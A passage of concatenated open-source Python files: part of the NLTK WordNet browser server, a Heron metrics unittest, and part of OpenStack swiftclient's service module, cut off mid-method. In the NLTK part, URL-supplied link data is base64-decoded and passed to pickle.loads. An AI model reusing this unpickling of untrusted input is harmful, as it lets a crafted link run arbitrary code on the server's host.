# This is weird. Adverbs such as 'quick' and 'fast' don't seem
# to have antonyms returned by the corpus.
return (
(ANTONYM, 'Antonym', lemma_property(word, synset, lambda l: l.antonyms())),
)
# Derived from adjective - not supported by corpus
else:
raise TypeError("Unhandles synset POS type: " + str(synset.pos()))
html_header = '''
<!DOCTYPE html PUBLIC '-//W3C//DTD HTML 4.01//EN'
'http://www.w3.org/TR/html4/strict.dtd'>
<html>
<head>
<meta name='generator' content=
'HTML Tidy for Windows (vers 14 February 2006), see www.w3.org'>
<meta http-equiv='Content-Type' content=
'text/html; charset=us-ascii'>
<title>NLTK Wordnet Browser display of: %s</title></head>
<body bgcolor='#F5F5F5' text='#000000'>
'''
html_trailer = '''
</body>
</html>
'''
explanation = '''
<h3>Search Help</h3>
<ul><li>The display below the line is an example of the output the browser
shows you when you enter a search word. The search word was <b>green</b>.</li>
<li>The search result shows for different parts of speech the <b>synsets</b>
i.e. different meanings for the word.</li>
<li>All underlined texts are hypertext links. There are two types of links:
word links and others. Clicking a word link carries out a search for the word
in the Wordnet database.</li>
<li>Clicking a link of the other type opens a display section of data attached
to that link. Clicking that link a second time closes the section again.</li>
<li>Clicking <u>S:</u> opens a section showing the relations for that synset.
</li>
<li>Clicking on a relation name opens a section that displays the associated
synsets.</li>
<li>Type a search word in the <b>Word</b> field and start the search by the
<b>Enter/Return</b> key or click the <b>Search</b> button.</li>
</ul>
<hr width='100%'>
'''
# HTML oriented functions
def _bold(txt):
return '<b>%s</b>' % txt
def _center(txt):
return '<center>%s</center>' % txt
def _hlev(n, txt):
return '<h%d>%s</h%d>' % (n, txt, n)
def _italic(txt):
return '<i>%s</i>' % txt
def _li(txt):
return '<li>%s</li>' % txt
def pg(word, body):
'''
Return an HTML page of NLTK Browser format constructed from the
word and body
:param word: The word that the body corresponds to
:type word: str
:param body: The HTML body corresponding to the word
:type body: str
:return: an HTML page for the word-body combination
:rtype: str
'''
return (html_header % word) + body + html_trailer
def _ul(txt):
return '<ul>' + txt + '</ul>'
def _abbc(txt):
"""
abbc = asterisks, breaks, bold, center
"""
return _center(_bold('<br>' * 10 + '*' * 10 + ' ' + txt + ' ' + '*' * 10))
full_hyponym_cont_text = _ul(_li(_italic('(has full hyponym continuation)'))) + '\n'
def _get_synset(synset_key):
"""
The synset key is the unique name of the synset; this can be
retrieved via synset.name()
"""
return wn.synset(synset_key)
def _collect_one_synset(word, synset, synset_relations):
'''
Returns the HTML string for one synset or word
:param word: the current word
:type word: str
:param synset: a synset
:type synset: synset
:param synset_relations: information about which synset relations
to display.
:type synset_relations: dict(synset_key, set(relation_id))
:return: The HTML string built for this synset
:rtype: str
'''
if isinstance(synset, tuple): # It's a word
raise NotImplementedError("word not supported by _collect_one_synset")
typ = 'S'
pos_tuple = _pos_match((synset.pos(), None, None))
assert pos_tuple is not None, "pos_tuple is null: synset.pos(): %s" % synset.pos()
descr = pos_tuple[2]
ref = copy.deepcopy(Reference(word, synset_relations))
ref.toggle_synset(synset)
synset_label = typ + ";"
if synset.name() in synset_relations:
synset_label = _bold(synset_label)
s = '<li>%s (%s) ' % (make_lookup_link(ref, synset_label), descr)
def format_lemma(w):
w = w.replace('_', ' ')
if w.lower() == word:
return _bold(w)
else:
ref = Reference(w)
return make_lookup_link(ref, w)
s += ', '.join(format_lemma(l.name()) for l in synset.lemmas())
gl = " (%s) <i>%s</i> " % (
synset.definition(),
"; ".join("\"%s\"" % e for e in synset.examples()),
)
return s + gl + _synset_relations(word, synset, synset_relations) + '</li>\n'
def _collect_all_synsets(word, pos, synset_relations=dict()):
"""
Return an HTML unordered list of synsets for the given word and
part of speech.
"""
return '<ul>%s\n</ul>\n' % ''.join(
(
_collect_one_synset(word, synset, synset_relations)
for synset in wn.synsets(word, pos)
)
)
def _synset_relations(word, synset, synset_relations):
'''
Builds the HTML string for the relations of a synset
:param word: The current word
:type word: str
:param synset: The synset for which we're building the relations.
:type synset: Synset
:param synset_relations: synset keys and relation types for which to display relations.
:type synset_relations: dict(synset_key, set(relation_type))
:return: The HTML for a synset's relations
:rtype: str
'''
if not synset.name() in synset_relations:
return ""
ref = Reference(word, synset_relations)
def relation_html(r):
if isinstance(r, Synset):
return make_lookup_link(Reference(r.lemma_names()[0]), r.lemma_names()[0])
elif isinstance(r, Lemma):
return relation_html(r.synset())
elif isinstance(r, tuple):
# It's probably a tuple containing a Synset and a list of
# similar tuples. This forms a tree of synsets.
return "%s\n<ul>%s</ul>\n" % (
relation_html(r[0]),
''.join('<li>%s</li>\n' % relation_html(sr) for sr in r[1]),
)
else:
raise TypeError(
"r must be a synset, lemma or list, it was: type(r) = %s, r = %s"
% (type(r), r)
)
def make_synset_html(db_name, disp_name, rels):
synset_html = '<i>%s</i>\n' % make_lookup_link(
copy.deepcopy(ref).toggle_synset_relation(synset, db_name).encode(),
disp_name,
)
if db_name in ref.synset_relations[synset.name()]:
synset_html += '<ul>%s</ul>\n' % ''.join(
"<li>%s</li>\n" % relation_html(r) for r in rels
)
return synset_html
html = (
'<ul>'
+ '\n'.join(
(
"<li>%s</li>" % make_synset_html(*rel_data)
for rel_data in get_relations_data(word, synset)
if rel_data[2] != []
)
)
+ '</ul>'
)
return html
class Reference(object):
"""
A reference to a page that may be generated by page_from_word
"""
def __init__(self, word, synset_relations=dict()):
"""
Build a reference to a new page.
word is the word or words (separated by commas) for which to
search for synsets of
synset_relations is a dictionary of synset keys to sets of
synset relation identifiers to unfold a list of synset
relations for.
"""
self.word = word
self.synset_relations = synset_relations
def encode(self):
"""
Encode this reference into a string to be used in a URL.
"""
# This uses a tuple rather than an object since the python
# pickle representation is much smaller and there is no need
# to represent the complete object.
string = pickle.dumps((self.word, self.synset_relations), -1)
return base64.urlsafe_b64encode(string).decode()
@staticmethod
def decode(string):
"""
Decode a reference encoded with Reference.encode
"""
string = base64.urlsafe_b64decode(string.encode())
word, synset_relations = pickle.loads(string)
return Reference(word, synset_relations)
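# Round-trip sketch (illustrative word): Reference('dog').encode() returns
# a urlsafe base64 string of the pickled ('dog', {}) tuple, and
# Reference.decode(<that string>).word == 'dog'. The encoded form is what
# make_lookup_link() embeds in the "lookup_..." hrefs handled by do_GET.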
def toggle_synset_relation(self, synset, relation):
"""
Toggle the display of the relations for the given synset and
relation type.
This function will throw a KeyError if the synset is currently
not being displayed.
"""
if relation in self.synset_relations[synset.name()]:
self.synset_relations[synset.name()].remove(relation)
else:
self.synset_relations[synset.name()].add(relation)
return self
def toggle_synset(self, synset):
"""
Toggle displaying of the relation types for the given synset
"""
if synset.name() in self.synset_relations:
del self.synset_relations[synset.name()]
else:
self.synset_relations[synset.name()] = set()
return self
def make_lookup_link(ref, label):
return '<a href="lookup_%s">%s</a>' % (ref.encode(), label)
def page_from_word(word):
"""
Return an HTML page for the given word.
:type word: str
:param word: The currently active word
:return: A tuple (page,word), where page is the new current HTML page
to be sent to the browser and
word is the new current word
:rtype: A tuple (str,str)
"""
return page_from_reference(Reference(word))
def page_from_href(href):
'''
Returns a tuple of the HTML page built and the new current word
:param href: The hypertext reference to be resolved
:type href: str
:return: A tuple (page,word), where page is the new current HTML page
to be sent to the browser and
word is the new current word
:rtype: A tuple (str,str)
'''
return page_from_reference(Reference.decode(href))
def page_from_reference(href):
'''
Returns a tuple of the HTML page built and the new current word
:param href: The Reference object to be resolved
:type href: str
:return: A tuple (page,word), where page is the new current HTML page
to be sent to the browser and
word is the new current word
:rtype: A tuple (str,str)
'''
word = href.word
pos_forms = defaultdict(list)
words = word.split(',')
words = [w for w in [w.strip().lower().replace(' ', '_') for w in words] if w != ""]
if len(words) == 0:
# No words were found.
return "", "Please specify a word to search for."
# This looks up multiple words at once. This is probably not
# necessary and may lead to problems.
for w in words:
for pos in [wn.NOUN, wn.VERB, wn.ADJ, wn.ADV]:
form = wn.morphy(w, pos)
if form and form not in pos_forms[pos]:
pos_forms[pos].append(form)
body = ''
for pos, pos_str, name in _pos_tuples():
if pos in pos_forms:
body += _hlev(3, name) + '\n'
for w in pos_forms[pos]:
# Not all words of exc files are in the database, skip
# to the next word if a KeyError is raised.
try:
body += _collect_all_synsets(w, pos, href.synset_relations)
except KeyError:
pass
if not body:
body = "The word or words '%s' where not found in the dictonary." % word
return body, word
#####################################################################
# Static pages
#####################################################################
def get_static_page_by_path(path):
"""
Return a static HTML page from the path given.
"""
if path == "index_2.html":
return get_static_index_page(False)
elif path == "index.html":
return get_static_index_page(True)
elif path == "NLTK Wordnet Browser Database Info.html":
return "Display of Wordnet Database Statistics is not supported"
elif path == "upper_2.html":
return get_static_upper_page(False)
elif path == "upper.html":
return get_static_upper_page(True)
elif path == "web_help.html":
return get_static_web_help_page()
elif path == "wx_help.html":
return get_static_wx_help_page()
else:
return "Internal error: Path for static page '%s' is unknown" % path
def get_static_web_help_page():
"""
Return the static web help page.
"""
return """
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<!-- Natural Language Toolkit: Wordnet Interface: Graphical Wordnet Browser
Copyright (C) 2001-2019 NLTK Project
Author: Jussi Salmela <jtsalmela@users.sourceforge.net>
URL: <http://nltk.org/>
For license information, see LICENSE.TXT -->
<head>
<meta http-equiv='Content-Type' content='text/html; charset=us-ascii'>
<title>NLTK Wordnet Browser display of: * Help *</title>
</head>
<body bgcolor='#F5F5F5' text='#000000'>
<h2>NLTK Wordnet Browser Help</h2>
<p>The NLTK Wordnet Browser is a tool to use in browsing the Wordnet database. It tries to behave like the Wordnet project's web browser but the difference is that the NLTK Wordnet Browser uses a local Wordnet database.
<p><b>You are using the Javascript client part of the NLTK Wordnet BrowseServer.</b> We assume your browser is in tab sheets enabled mode.</p>
<p>For background information on Wordnet, see the Wordnet project home page: <a href="http://wordnet.princeton.edu/"><b> http://wordnet.princeton.edu/</b></a>. For more information on the NLTK project, see the project home:
<a href="http://nltk.sourceforge.net/"><b>http://nltk.sourceforge.net/</b></a>. To get an idea of what the Wordnet version used by this browser includes choose <b>Show Database Info</b> from the <b>View</b> submenu.</p>
<h3>Word search</h3>
<p>The word to be searched is typed into the <b>New Word</b> field and the search started with Enter or by clicking the <b>Search</b> button. There is no uppercase/lowercase distinction: the search word is transformed to lowercase before the search.</p>
<p>In addition, the word does not have to be in base form. The browser tries to find the possible base form(s) by making certain morphological substitutions. Typing <b>fLIeS</b> as an obscure example gives one <a href="MfLIeS">this</a>. Click the previous link to see what this kind of search looks like and then come back to this page by using the <b>Alt+LeftArrow</b> key combination.</p>
<p>The result of a search is a display of one or more
<b>synsets</b> for every part of speech in which a form of the
search word was found to occur. A synset is a set of words
having the same sense or meaning. Each word in a synset that is
underlined is a hyperlink which can be clicked to trigger an
automatic search for that word.</p>
<p>Every synset has a hyperlink <b>S:</b> at the start of its
display line. Clicking that symbol shows you the name of every
<b>relation</b> that this synset is part of. Every relation name is a hyperlink that opens up a display for that relation. Clicking it another time closes the display again. Clicking another relation name on a line that has an opened relation closes the open relation and opens the clicked relation.</p>
<p>It is also possible to give two or more words or collocations to be searched at the same time separating them with a comma like this <a href="Mcheer up,clear up">cheer up,clear up</a>, for example. Click the previous link to see what this kind of search looks like and then come back to this page by using the <b>Alt+LeftArrow</b> key combination. As you could see, the search result includes the synsets found in the same order as the forms were given in the search field.</p>
<p>
There are also word level (lexical) relations recorded in the Wordnet database. Opening this kind of relation displays lines with a hyperlink <b>W:</b> at their beginning. Clicking this link shows more info on the word in question.</p>
<h3>The Buttons</h3>
<p>The <b>Search</b> and <b>Help</b> buttons need no more explanation. </p>
<p>The <b>Show Database Info</b> button shows a collection of Wordnet database statistics.</p>
<p>The <b>Shutdown the Server</b> button is shown for the first client of the BrowServer program i.e. for the client that is automatically launched when the BrowServer is started but not for the succeeding clients in order to protect the server from accidental shutdowns.
</p></body>
</html>
"""
def get_static_welcome_message():
"""
Get the static welcome page.
"""
return """
<h3>Search Help</h3>
<ul><li>The display below the line is an example of the output the browser
shows you when you enter a search word. The search word was <b>green</b>.</li>
<li>The search result shows for different parts of speech the <b>synsets</b>
i.e. different meanings for the word.</li>
<li>All underlined texts are hypertext links. There are two types of links:
word links and others. Clicking a word link carries out a search for the word
in the Wordnet database.</li>
<li>Clicking a link of the other type opens a display section of data attached
to that link. Clicking that link a second time closes the section again.</li>
<li>Clicking <u>S:</u> opens a section showing the relations for that synset.</li>
<li>Clicking on a relation name opens a section that displays the associated
synsets.</li>
<li>Type a search word in the <b>Next Word</b> field and start the search by the
<b>Enter/Return</b> key or click the <b>Search</b> button.</li>
</ul>
"""
def get_static_index_page(with_shutdown):
"""
Get the static index page.
"""
template = """
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "http://www.w3.org/TR/html4/frameset.dtd">
<HTML>
<!-- Natural Language Toolkit: Wordnet Interface: Graphical Wordnet Browser
Copyright (C) 2001-2019 NLTK Project
Author: Jussi Salmela <jtsalmela@users.sourceforge.net>
URL: <http://nltk.org/>
For license information, see LICENSE.TXT -->
<HEAD>
<TITLE>NLTK Wordnet Browser</TITLE>
</HEAD>
<frameset rows="7%%,93%%">
<frame src="%s" name="header">
<frame src="start_page" name="body">
</frameset>
</HTML>
"""
if with_shutdown:
upper_link = "upper.html"
else:
upper_link = "upper_2.html"
return template % upper_link
def get_static_upper_page(with_shutdown):
"""
Return the upper frame page.
If with_shutdown is True then a 'shutdown' button is also provided
to shutdown the server.
"""
template = """
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<!-- Natural Language Toolkit: Wordnet Interface: Graphical Wordnet Browser
Copyright (C) 2001-2019 NLTK Project
Author: Jussi Salmela <jtsalmela@users.sourceforge.net>
URL: <http://nltk.org/>
For license information, see LICENSE.TXT -->
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Untitled Document</title>
</head>
<body>
<form method="GET" action="search" target="body">
Current Word: <input type="text" id="currentWord" size="10" disabled>
Next Word: <input type="text" id="nextWord" name="nextWord" size="10">
<input name="searchButton" type="submit" value="Search">
</form>
<a target="body" href="web_help.html">Help</a>
%s
</body>
</html>
"""
if with_shutdown:
shutdown_link = "<a href=\"SHUTDOWN THE SERVER\">Shutdown</a>"
else:
shutdown_link = ""
return template % shutdown_link
def usage():
"""
Display the command line help message.
"""
print(__doc__)
def app():
# Parse and interpret options.
(opts, _) = getopt.getopt(
argv[1:], "l:p:sh", ["logfile=", "port=", "server-mode", "help"]
)
port = 8000
server_mode = False
help_mode = False
logfilename = None
for (opt, value) in opts:
if (opt == "-l") or (opt == "--logfile"):
logfilename = str(value)
elif (opt == "-p") or (opt == "--port"):
port = int(value)
elif (opt == "-s") or (opt == "--server-mode"):
server_mode = True
elif (opt == "-h") or (opt == "--help"):
help_mode = True
if help_mode:
usage()
else:
wnb(port, not server_mode, logfilename)
if __name__ == '__main__':
app()
__all__ = ['app']
|
global_metrics_unittest.py
|
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
# Copyright 2016 Twitter. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# pylint: disable=missing-docstring
import unittest
import threading
from heronpy.api import global_metrics
import heron.instance.tests.python.utils.mock_generator as mock_generator
class GlobalMetricsTest(unittest.TestCase):
def setUp(self):
self.metrics_collector = mock_generator.MockMetricsCollector()
global_metrics.init(self.metrics_collector, 10)
self.lock = threading.Lock()
def test_normal(self):
global_metrics.incr("mycounter_a")
global_metrics.incr("mycounter_b", 3)
global_metrics.safe_incr("mycounter_c", 5)
counter = global_metrics.metricsContainer
d = counter.get_value_and_reset()
self.assertTrue("mycounter_a" in d)
self.assertTrue("mycounter_b" in d)
self.assertTrue("mycounter_c" in d)
self.assertEqual(d["mycounter_a"], 1)
self.assertEqual(d["mycounter_b"], 3)
self.assertEqual(d["mycounter_c"], 5)
def concurrent_incr(self):
def incr_worker():
global_metrics.safe_incr("K")
global_metrics.safe_incr("K", 2)
global_metrics.safe_incr("K", 3)
threads = []
for i in range(10):
t = threading.Thread(target=incr_worker)
threads.append(t)
t.start()
for t in threads:
t.join()
counter = global_metrics.metricsContainer
d = counter.get_value_and_reset()
self.assertTrue("K" in d)
self.assertEqual(d["K"], 60)
def test_concurrent_incr(self):
for i in range(100):
global_metrics.metricsContainer.get_value_and_reset()
self.concurrent_incr()
|
service.py
|
# Copyright (c) 2010-2013 OpenStack, LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import unicode_literals
import logging
import os
from concurrent.futures import as_completed, CancelledError, TimeoutError
from copy import deepcopy
from errno import EEXIST, ENOENT
from hashlib import md5
from os import environ, makedirs, stat, utime
from os.path import (
basename, dirname, getmtime, getsize, isdir, join, sep as os_path_sep
)
from posixpath import join as urljoin
from random import shuffle
from time import time
from threading import Thread
from six import StringIO, text_type
from six.moves.queue import Queue
from six.moves.queue import Empty as QueueEmpty
from six.moves.urllib.parse import quote
from six import Iterator, string_types
import json
from swiftclient import Connection
from swiftclient.command_helpers import (
stat_account, stat_container, stat_object
)
from swiftclient.utils import (
config_true_value, ReadableToIterable, LengthWrapper, EMPTY_ETAG,
parse_api_response, report_traceback, n_groups
)
from swiftclient.exceptions import ClientException
from swiftclient.multithreading import MultiThreadingManager
logger = logging.getLogger("swiftclient.service")
class ResultsIterator(Iterator):
def __init__(self, futures):
self.futures = interruptable_as_completed(futures)
def __iter__(self):
return self
def __next__(self):
next_completed_future = next(self.futures)
return next_completed_future.result()
class SwiftError(Exception):
def __init__(self, value, container=None, obj=None,
segment=None, exc=None):
self.value = value
self.container = container
self.obj = obj
self.segment = segment
self.exception = exc
def __str__(self):
value = repr(self.value)
if self.container is not None:
value += " container:%s" % self.container
if self.obj is not None:
value += " object:%s" % self.obj
if self.segment is not None:
value += " segment:%s" % self.segment
return value
def process_options(options):
# tolerate sloppy auth_version
if options.get('auth_version') == '3.0':
options['auth_version'] = '3'
elif options.get('auth_version') == '2':
options['auth_version'] = '2.0'
if options.get('auth_version') not in ('2.0', '3') and not all(
options.get(key) for key in ('auth', 'user', 'key')):
# Use keystone auth if any of the new-style args are present
if any(options.get(k) for k in (
'os_user_domain_id',
'os_user_domain_name',
'os_project_domain_id',
'os_project_domain_name')):
# Use v3 if there's any reference to domains
options['auth_version'] = '3'
else:
options['auth_version'] = '2.0'
# Use new-style args if old ones not present
if not options['auth'] and options['os_auth_url']:
options['auth'] = options['os_auth_url']
if not options['user'] and options['os_username']:
options['user'] = options['os_username']
if not options['key'] and options['os_password']:
options['key'] = options['os_password']
# Specific OpenStack options
options['os_options'] = {
'user_id': options['os_user_id'],
'user_domain_id': options['os_user_domain_id'],
'user_domain_name': options['os_user_domain_name'],
'tenant_id': options['os_tenant_id'],
'tenant_name': options['os_tenant_name'],
'project_id': options['os_project_id'],
'project_name': options['os_project_name'],
'project_domain_id': options['os_project_domain_id'],
'project_domain_name': options['os_project_domain_name'],
'service_type': options['os_service_type'],
'endpoint_type': options['os_endpoint_type'],
'auth_token': options['os_auth_token'],
'object_storage_url': options['os_storage_url'],
'region_name': options['os_region_name'],
}
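# Illustrative examples of the coercion above (option values are made up):
# {'auth_version': '3.0'} is normalised to '3'; if no usable legacy
# auth/user/key triple is supplied and an 'os_project_domain_name' is set,
# keystone v3 is selected, otherwise the fallback is keystone '2.0'.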
def _build_default_global_options():
return {
"snet": False,
"verbose": 1,
"debug": False,
"info": False,
"auth": environ.get('ST_AUTH'),
"auth_version": environ.get('ST_AUTH_VERSION', '1.0'),
"user": environ.get('ST_USER'),
"key": environ.get('ST_KEY'),
"retries": 5,
"os_username": environ.get('OS_USERNAME'),
"os_user_id": environ.get('OS_USER_ID'),
"os_user_domain_name": environ.get('OS_USER_DOMAIN_NAME'),
"os_user_domain_id": environ.get('OS_USER_DOMAIN_ID'),
"os_password": environ.get('OS_PASSWORD'),
"os_tenant_id": environ.get('OS_TENANT_ID'),
"os_tenant_name": environ.get('OS_TENANT_NAME'),
"os_project_name": environ.get('OS_PROJECT_NAME'),
"os_project_id": environ.get('OS_PROJECT_ID'),
"os_project_domain_name": environ.get('OS_PROJECT_DOMAIN_NAME'),
"os_project_domain_id": environ.get('OS_PROJECT_DOMAIN_ID'),
"os_auth_url": environ.get('OS_AUTH_URL'),
"os_auth_token": environ.get('OS_AUTH_TOKEN'),
"os_storage_url": environ.get('OS_STORAGE_URL'),
"os_region_name": environ.get('OS_REGION_NAME'),
"os_service_type": environ.get('OS_SERVICE_TYPE'),
"os_endpoint_type": environ.get('OS_ENDPOINT_TYPE'),
"os_cacert": environ.get('OS_CACERT'),
"os_cert": environ.get('OS_CERT'),
"os_key": environ.get('OS_KEY'),
"insecure": config_true_value(environ.get('SWIFTCLIENT_INSECURE')),
"ssl_compression": False,
'segment_threads': 10,
'object_dd_threads': 10,
'object_uu_threads': 10,
'container_threads': 10
}
_default_global_options = _build_default_global_options()
_default_local_options = {
'sync_to': None,
'sync_key': None,
'use_slo': False,
'segment_size': None,
'segment_container': None,
'leave_segments': False,
'changed': None,
'skip_identical': False,
'yes_all': False,
'read_acl': None,
'write_acl': None,
'out_file': None,
'out_directory': None,
'remove_prefix': False,
'no_download': False,
'long': False,
'totals': False,
'marker': '',
'header': [],
'meta': [],
'prefix': None,
'delimiter': None,
'fail_fast': False,
'human': False,
'dir_marker': False,
'checksum': True,
'shuffle': False
}
POLICY = 'X-Storage-Policy'
KNOWN_DIR_MARKERS = (
'application/directory', # Preferred
'text/directory', # Historically relevant
)
def get_from_queue(q, timeout=864000):
while True:
try:
item = q.get(timeout=timeout)
return item
except QueueEmpty:
# Do nothing here, we only have a timeout to allow interruption
pass
def get_future_result(f, timeout=86400):
while True:
try:
res = f.result(timeout=timeout)
return res
except TimeoutError:
# Do nothing here, we only have a timeout to allow interruption
pass
def interruptable_as_completed(fs, timeout=86400):
while True:
try:
for f in as_completed(fs, timeout=timeout):
fs.remove(f)
yield f
return
except TimeoutError:
# Do nothing here, we only have a timeout to allow interruption
pass
def get_conn(options):
"""
Return a connection building it from the options.
"""
return Connection(options['auth'],
options['user'],
options['key'],
options['retries'],
auth_version=options['auth_version'],
os_options=options['os_options'],
snet=options['snet'],
cacert=options['os_cacert'],
insecure=options['insecure'],
cert=options['os_cert'],
cert_key=options['os_key'],
ssl_compression=options['ssl_compression'])
def mkdirs(path):
try:
makedirs(path)
except OSError as err:
if err.errno != EEXIST:
raise
def split_headers(options, prefix=''):
"""
Splits 'Key: Value' strings and returns them as a dictionary.
:param options: An array of 'Key: Value' strings
:param prefix: String to prepend to all of the keys in the dictionary.
"""
headers = {}
for item in options:
split_item = item.split(':', 1)
if len(split_item) == 2:
headers[(prefix + split_item[0]).title()] = split_item[1]
else:
raise SwiftError(
"Metadata parameter %s must contain a ':'.\n%s"
% (item, "Example: 'Color:Blue' or 'Size:Large'")
)
return headers
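# Illustrative example: split_headers(['Color:Blue'], 'X-Object-Meta-')
# returns {'X-Object-Meta-Color': 'Blue'}, while an item without a ':'
# raises SwiftError.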
class SwiftUploadObject(object):
"""
Class for specifying an object upload, allowing the object source, name and
options to be specified separately for each individual object.
"""
def __init__(self, source, object_name=None, options=None):
if isinstance(source, string_types):
self.object_name = object_name or source
elif source is None or hasattr(source, 'read'):
if not object_name or not isinstance(object_name, string_types):
raise SwiftError('Object names must be specified as '
'strings for uploads from None or file '
'like objects.')
self.object_name = object_name
else:
raise SwiftError('Unexpected source type for '
'SwiftUploadObject: {0}'.format(type(source)))
if not self.object_name:
raise SwiftError('Object names must not be empty strings')
self.object_name = self.object_name.lstrip('/')
self.options = options
self.source = source
class SwiftPostObject(object):
"""
Class for specifying an object post, allowing the headers/metadata to be
specified separately for each individual object.
"""
def __init__(self, object_name, options=None):
if not isinstance(object_name, string_types) or not object_name:
raise SwiftError(
"Object names must be specified as non-empty strings"
)
else:
self.object_name = object_name
self.options = options
class _SwiftReader(object):
"""
Class for downloading objects from swift and raising appropriate
errors on failures caused by either invalid md5sum or size of the
data read.
"""
def __init__(self, path, body, headers, checksum=True):
self._path = path
self._body = body
self._actual_read = 0
self._content_length = None
self._actual_md5 = None
self._expected_etag = headers.get('etag')
if ('x-object-manifest' not in headers
and 'x-static-large-object' not in headers and checksum):
self._actual_md5 = md5()
if 'content-length' in headers:
try:
self._content_length = int(headers.get('content-length'))
except ValueError:
raise SwiftError('content-length header must be an integer')
def __iter__(self):
for chunk in self._body:
if self._actual_md5:
self._actual_md5.update(chunk)
self._actual_read += len(chunk)
yield chunk
self._check_contents()
def _check_contents(self):
if self._actual_md5 and self._expected_etag:
etag = self._actual_md5.hexdigest()
if etag != self._expected_etag:
raise SwiftError('Error downloading {0}: md5sum != etag, '
'{1} != {2}'.format(
self._path, etag, self._expected_etag))
if (self._content_length is not None
and self._actual_read != self._content_length):
raise SwiftError('Error downloading {0}: read_length != '
'content_length, {1:d} != {2:d}'.format(
self._path, self._actual_read,
self._content_length))
def bytes_read(self):
return self._actual_read
class SwiftService(object):
"""
Service for performing swift operations
"""
def __init__(self, options=None):
if options is not None:
self._options = dict(
_default_global_options,
**dict(_default_local_options, **options)
)
else:
self._options = dict(
_default_global_options,
**_default_local_options
)
process_options(self._options)
create_connection = lambda: get_conn(self._options)
self.thread_manager = MultiThreadingManager(
create_connection,
segment_threads=self._options['segment_threads'],
object_dd_threads=self._options['object_dd_threads'],
object_uu_threads=self._options['object_uu_threads'],
container_threads=self._options['container_threads']
)
self.capabilities_cache = {} # Each instance should have its own cache
def __enter__(self):
self.thread_manager.__enter__()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.thread_manager.__exit__(exc_type, exc_val, exc_tb)
# Stat related methods
#
def stat(self, container=None, objects=None, options=None):
"""
Get account stats, container stats or information about a list of
objects in a container.
:param container: The container to query.
:param objects: A list of object paths about which to return
information (a list of strings).
:param options: A dictionary containing options to override the global
options specified during the service object creation.
These options are applied to all stat operations
performed by this call::
{
'human': False
}
:returns: Either a single dictionary containing stats about an account
or container, or an iterator for returning the results of the
stat operations on a list of objects.
:raises: SwiftError
"""
if options is not None:
options = dict(self._options, **options)
else:
options = self._options
if not container:
if objects:
raise SwiftError('Objects specified without container')
else:
res = {
'action': 'stat_account',
'success': True,
'container': container,
'object': None,
}
try:
stats_future = self.thread_manager.container_pool.submit(
stat_account, options
)
items, headers = get_future_result(stats_future)
res.update({
'items': items,
'headers': headers
})
return res
except ClientException as err:
if err.http_status != 404:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
})
return res
raise SwiftError('Account not found', exc=err)
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
})
return res
else:
if not objects:
res = {
'action': 'stat_container',
'container': container,
'object': None,
'success': True,
}
try:
stats_future = self.thread_manager.container_pool.submit(
stat_container, options, container
)
items, headers = get_future_result(stats_future)
res.update({
'items': items,
'headers': headers
})
return res
except ClientException as err:
if err.http_status != 404:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
})
return res
raise SwiftError('Container %r not found' % container,
container=container, exc=err)
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
})
return res
else:
stat_futures = []
for stat_o in objects:
stat_future = self.thread_manager.object_dd_pool.submit(
self._stat_object, container, stat_o, options
)
stat_futures.append(stat_future)
return ResultsIterator(stat_futures)
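# Usage sketch for stat() (container and object names are illustrative):
#
#   with SwiftService() as swift:
#       acct = swift.stat()                                # account dict
#       cont = swift.stat(container='photos')              # container dict
#       for res in swift.stat(container='photos', objects=['cat.jpg']):
#           print(res['success'], res['headers'])          # per-object dicts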
@staticmethod
def _stat_object(conn, container, obj, options):
res = {
'action': 'stat_object',
'object': obj,
'container': container,
'success': True,
}
try:
items, headers = stat_object(conn, options, container, obj)
res.update({
'items': items,
'headers': headers
})
return res
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
})
return res
# Post related methods
#
def post(self, container=None, objects=None, options=None):
"""
Post operations on an account, container or list of objects
:param container: The container to make the post operation against.
:param objects: A list of object names (strings) or SwiftPostObject
instances containing an object name, and an
options dict (can be None) to override the options for
that individual post operation::
[
'object_name',
SwiftPostObject('object_name', options={...}),
...
]
The options dict is described below.
:param options: A dictionary containing options to override the global
options specified during the service object creation.
These options are applied to all post operations
performed by this call, unless overridden on a per
object basis. Possible options are given below::
{
'meta': [],
'header': [],
'read_acl': None, # For containers only
'write_acl': None, # For containers only
'sync_to': None, # For containers only
'sync_key': None # For containers only
}
:returns: Either a single result dictionary in the case of a post to a
container/account, or an iterator for returning the results
of posts to a list of objects.
:raises: SwiftError
"""
if options is not None:
options = dict(self._options, **options)
else:
options = self._options
res = {
'success': True,
'container': container,
'object': None,
'headers': {},
}
if not container:
res["action"] = "post_account"
if objects:
raise SwiftError('Objects specified without container')
else:
